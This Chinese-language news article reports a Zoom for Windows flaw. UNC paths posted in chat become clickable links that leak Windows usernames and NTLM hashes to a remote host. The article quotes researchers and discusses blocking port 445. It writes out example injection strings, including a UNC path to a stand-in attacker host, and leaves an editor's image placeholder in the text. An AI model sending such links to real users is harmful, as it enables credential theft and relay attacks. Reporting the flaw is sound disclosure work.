Windows 版 Zoom 的使用者请注意!安全研究人员指出,就在 Zoom 使用者最近饱受「Zoom-Bombing」恶作剧不堪图片轰炸的攻击之际,这个原本在疫情期间被赋予重望的热门云端视讯会议软体又再度发现另一个安全漏洞,恶意攻击者可以透过这个漏洞窃取使用者的 Windows 作业系统凭证。
在 Zoom 使用量随着新冠病毒疫情大流行而激增的同时,发现了这个当前仍未修补的漏洞。随着愈来愈多的人居家工作,不少人开始依赖 Zoom 来与同事、顾客及合作伙伴连繫。许多这类居家使用者透过暂时性或随意凑合的方式连线到具商业敏感性的工作网路上,最令人担心的,莫过于这些方式无法获得企业级防火墙的安全防护。
点击恶意连结凭证会自动外送
该攻击是透过 Zoom 聊天视窗而向锁定目标发送一组代表他们所使用 Windows 装置之网路位置的纯文字串。这个 Windows 版 Zoom 应用程式会自动将这些所谓的「通用命名惯例」(Universal Naming Convention)字串(例如 \\ attacker.example.com/C$)转换为可点击的连结。如果被锁定使用者点击了这些尚未完全锁定的网路连结,Zoom 会将 Windows 使用者名称和相应的 NTLM 杂凑发送到包含在连结中的位址上。
然后攻击者便可透过凭证存取共享网路资源,例如 Outlook 伺服器和储存装置。通常,在对某装置进行身分验证时,Windows 网路上的资源将接受 NTLM 杂凑值。这使得网路很容易受到所谓「传递杂凑」(Pass-the-Hash)攻击,这类攻击不需要藉助破解技术就能将杂凑值转换为相应的纯文字明码。
「这的确是 Zoom 的一大安全缺陷,」安全方案商 Hacker House 联合创办人 Matthew Hickey 指出:「这原本是一个毫不起眼的小瑕疵。现在,随着愈来愈多的人居家工作,益使得运用该漏洞的攻击之举变得更加容易。」
上週,一名安全研究人员在推特上以 @ _g0dmode 作为 Twitter handle 而首次介绍了这个漏洞。他写道:「#Zoom 聊天软体允许你张贴像 \\ x.x.x.x \ xyz 之类的连结,一旦被其他使用者点击,就会尝试撷取 Net-NTLM 杂凑。」
週二,Hickey 更进一步详述了这个发现。他在一则推文中展示了 Zoom Windows 用户端如何洩漏可用来存取有限部分 Windows 网路的凭证。
「嗨 @zoom_us &@NCSC,」Hickey 回覆写道:「以下是一个使用 UNC 路径注入来运用 Zoom Windows 用户端漏洞以洩漏用于 SMBRelay 攻击中凭证的範例。以下所萤幕撷图显示了一个範例 UNC 路径连结和被洩漏(经修改)的凭证。」
<#麻烦请插图:凭证外洩範例撷图.jpg>
这个萤幕撷图显示 Windows 使用者名称为 Bluemoon/HackerFantastic。随后在其下出现了 NTLM 杂凑,儘管 Hickey 在他所张贴的图像中修改了大部分的杂凑。
骇客会搭配 Zoom-Bombing 攻击
攻击者可以冒充合法与会者来发动攻击,也可以在所谓「Zoom-Bombing」攻击中趁乱窃取 Window 凭证,透过这样的手法,攻击者可以进入没有密码保护的线上会议中,然后用攻击性或骚扰性的恶意图片来轰炸其他人。
虽然这种攻击只针对 Windows 使用者,但 Hickey 表示,事实上仍可透过任何版本的 Zoom 来发动攻击,其同样的是透过向目标攻击对象发送一则内含 UNC 位置之纯文字讯息的手法。当 Windows 用户在连接到某些不安全机器或网路的同时点击了该连结,Zoom 应用程式会经由 445 连接埠向外发送凭证,该连接埠多半用来传输与 Windows SMB 和 Active Directory(AD)目录服务相关的流量。
如果关闭了 445 连接埠对网际网路的开放(不是透过置或网路防火墙,就是透过 ISP 网路服务供应商来加以封锁),那幺骇客就无法发动这样的攻击。但是,如此一来也会将 Zoom 服务关闭,所以企业不见得会关闭 445 连接埠。过去一个月愈演愈烈的疫情大流行趋势,让数以百万计的居家工作者失去了他们原本在工作场合所能获得之相同水準的 IT 与安全支援。这使得 445 连接埠很有可能处于开放状态,其可能是因为疏忽,也可能是基于连接企业资源的需要而开放的。
- Attackers can use Zoom to steal users’ Windows credentials with no warning
